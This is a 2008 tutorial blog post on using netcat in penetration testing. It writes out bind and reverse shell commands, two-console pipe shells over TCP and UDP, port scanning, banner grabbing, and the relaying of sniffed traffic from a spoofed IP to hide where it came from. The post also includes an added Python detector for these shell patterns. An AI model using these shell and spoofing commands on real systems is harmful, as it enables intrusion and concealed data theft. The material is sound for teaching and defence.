Wednesday, July 2, 2008

How To Use Netcat

This short paper points out a few scenarios in which netcat can be used during
penetration testing. Bear in mind that it can also be used for more complex
scenarios, or in forensics, where data is sent to another machine for storage,
and so on.

Netcat has a compile-time option that makes netcat (from now on nc) execute
a program for the connecting or listening process. This is useful for sending
a shell to the attacker. Also note that the switches might differ between
platforms, e.g. OpenBSD lacks the -p switch.

Download Netcat here:
Unix | Win

Alternatives:
http://farm9.com/content/Free_Tools/Cryptcat - Encrypted traffic with Blowfish
http://www.dest-unreach.org/socat/ - Netcat with extended design & features
http://www.stunnel.org/ - Useful if you need to do stuff with HTTPS

TCP
---

If there is no firewall protecting the target, nc is available on it (or has
been uploaded somehow), and there is a way to issue commands on the target
(e.g. a badly programmed web application), the attacker could put up an
nc listener that shovels back an interactive shell:

On the target:
nc -l -p port -e /bin/sh

From the attacker:
nc target_ip port

If, however, there is a firewall in place that stops the attacker from connecting
to a specific port on the target system, they could try to get the target to
connect back to them. This is possible only if the firewall allows certain
outgoing connections:

On the attacker:
nc -l -p port

From the target:
nc -e /bin/sh attacker_ip port

In the case where nc has not been compiled with the -e option, there are still
ways to shovel back a shell to the attacker. By piping stdin from one listener
and stdout to another, the attacker gets one console for issuing commands and
one console for the results:

On the attacker:
nc -l -p port1
nc -l -p port2

From the target:
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2


UDP
---

In the case where TCP is restricted, one has to check for possible UDP avenues.
UDP is unreliable, but it can work, and it allows spoofing if there is need for
it. After testing it, we concluded that it has to be used in the two-console
way; it wasn't working without echoing an initial character:

On the attacker:
nc -l -u -p port1
nc -l -u -p port2

From the target:
echo "" | nc -u attacker_ip port1 | /bin/sh | nc -u attacker_ip port2

This way, however, requires two UDP ports to be available. There is another way
where one port is enough. This usually means port 53, as it could be wrongly
configured at the firewall level, allowing traffic both ways:

On attacker:
nc -l -u -p 53

On target:
nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53

From attacker:
cat | nc -u target_ip 53

This way the attacker again has a command console and an output console
available. Remember that binding ports under 1024 requires privileges
equivalent to system/root/administrator. The UDP method would not work from
behind a NATted environment.
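Both the -e form and the two-console pipe form above leave the same marks in a process or execve audit trail: an nc binary given -e pointing at a shell, or a shell sitting between two nc stages of one pipeline, with -l and -u telling listener from outbound and TCP from UDP. The following Python script, added here as an example and not part of the original post, tokenises recorded command lines and flags exactly those patterns; the binary names, shell list and any sample command lines are constructed assumptions.

```python
import os
import shlex

# Assumed names netcat runs under, and interpreters that mark a shovelled shell.
NC_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe"}

def split_pipeline(cmdline):
    """Tokenise a recorded shell command line and split it on '|' into stages."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages, cur = [], []
    for tok in lex:
        if tok == "|":
            stages.append(cur)
            cur = []
        else:
            cur.append(tok)
    stages.append(cur)
    return [s for s in stages if s]

def head(stage):
    return os.path.basename(stage[0])  # program name without its directory

def nc_flags(stage):
    """Collect single-letter switches (-vvnlp -> {v,n,l,p}) and the -e target."""
    flags, exec_target = set(), None
    for i, tok in enumerate(stage[1:], 1):
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            flags.update(tok[1:])
            if tok.endswith("e") and i + 1 < len(stage):
                exec_target = stage[i + 1]
    return flags, exec_target

def analyze(cmdline):
    """Return (pattern, direction, transport) findings for one command line."""
    stages = split_pipeline(cmdline)
    nc_stages = [nc_flags(s) for s in stages if head(s) in NC_NAMES]
    all_flags = set().union(*(f for f, _ in nc_stages))
    direction = "listener" if "l" in all_flags else "outbound"
    transport = "udp" if "u" in all_flags else "tcp"
    findings = []
    # Pattern 1: nc -e <shell>, via the compile-time -e option (bind or reverse).
    for _, target in nc_stages:
        if target and os.path.basename(target) in SHELLS:
            findings.append(("exec-shell", direction, transport))
    # Pattern 2: nc ... | /bin/sh | nc ..., the two-console variant without -e.
    for prev, cur, nxt in zip(stages, stages[1:], stages[2:]):
        if head(cur) in SHELLS and head(prev) in NC_NAMES and head(nxt) in NC_NAMES:
            findings.append(("pipe-shell", direction, transport))
    return findings
```

Plain scans (-z), file transfers and banner grabs produce no finding, so the rule stays quiet on the legitimate uses later in this post.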


Portscanning:
-------------

Examples:
TCP: nc -vvn -z xxx.xxx.xxx.xxx 21-25
UDP: nc -u -vvn -z xxx.xxx.xxx.xxx 514


Banner-grabbing:
----------------

Win:
for /f %i in (iplist.txt) do nc -vvn %i 80 < get.txt

Unix:
for f in `cat iplist.txt`; do nc $f 80 < get.txt; done

get.txt would contain "HEAD / HTTP/1.0" followed by two returns; with just two
returns it would work on other ports too. iplist.txt would contain the IPs that
you want to scan.

When HTTPS is involved, you might want to look into stunnel:
(echo "HEAD / HTTP/1.0"; echo; ) | /usr/sbin/stunnel -c -r host:port


Transferring files:
-------------------

Listener:
nc -vvnlp 3000 -w 3 > file

Sender:
nc -vvn xxx.xxx.xxx.xxx 3000 < file

You can also do a neat trick with UDP and IP spoofing. If you are listening for
traffic on a segment, you could send that traffic to another host via UDP. This
only works if you don't care about ACKs, and in our opinion it is useful only if
you want to hide the origin of the packets.

Tcpdump usage would be done like this:

tcpdump -l -xX -vvv -tttt | nc -u -s spoofed_ip listener_ip port

This, however, requires you to bind the spoofed IP to your interface; on Linux
it can be done by typing 'ifconfig eth0:n spoofed_ip', where n is the next
free alias. This will cause problems for the host you're spoofing, as you
announce the same IP on the network. To do similar things without causing as
many problems, you could check out hping.

As an end note, we would like to say: use your own imagination. Netcat is not
called the Swiss Army Knife of networking tools for nothing :)

Happy netcatting :)
